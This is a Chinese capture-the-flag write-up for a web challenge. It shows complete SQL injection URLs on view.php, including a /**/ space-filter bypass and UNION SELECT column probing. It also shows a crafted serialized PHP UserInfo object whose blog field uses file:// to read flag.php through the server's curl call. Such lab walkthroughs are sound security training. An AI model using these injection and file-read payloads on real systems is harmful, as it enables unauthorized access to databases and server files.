打开页面有一个登录键(login)和一个注册键(join)
1.png
点击注册要求输入用户名、密码、年龄、博客地址,其中博客地址要求为域名格式,随便输入一个如www.baidu.com注册完成后自动登录,进入登陆后页面
2.png
可以点击用户名跳转
3.png
可以看到url上存在一个参数no=1,如果多注册几个用户就可以知道no是依次递增的,因此这里可能存在sql注入,构造url:
http://111.198.29.45:38493/view.php?no=0%20union%20select%201,2,3%20from%20users%23
4.png
被过滤,这里被过滤的是空格,用/**/代替即可,构造url:
http://111.198.29.45:38493/view.php?no=0%20union/**/select%201,2,3%20from%20users%23
5.png
查询列数不对,更改列数,构造url:
http://111.198.29.45:38493/view.php?no=0%20union/**/select%201,2,3,4%20from%20users%23
6.png
这里可以看到sql查询已经完成,但是反序列化的时候出错了,猜测数据库中查询到的是序列化后的字符串。我们可以在/robots.txt中发现user.php的备份文件,下载后如下:
<?php
class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";
public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
}
直接在下面添加payload:
$a = new UserInfo("12","12","127.0.0.1");
echo serialize($a);
打开apache,复制序列化后的字符串,添加到查询url中去,可以依次尝试4列,实际上序列化后的字符串是第四列,payload:http://111.198.29.45:38493/view.php?no=0%20union/**/select%201,2,3,'O:8:"UserInfo":3:{s:4:"name";s:2:"12";s:3:"age";i:12;s:4:"blog";s:9:"127.0.0.1";}'%20from%20users%23
查询成功,修改iframe高即可在iframe中看到题目页面,然后利用file协议,构造payload:http://111.198.29.45:38493/view.php?no=0%20union/**/select%201,2,3,'O:8:"UserInfo":3:{s:4:"name";s:2:"12";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'%20from%20users%23即可在注释中获取flag
网友评论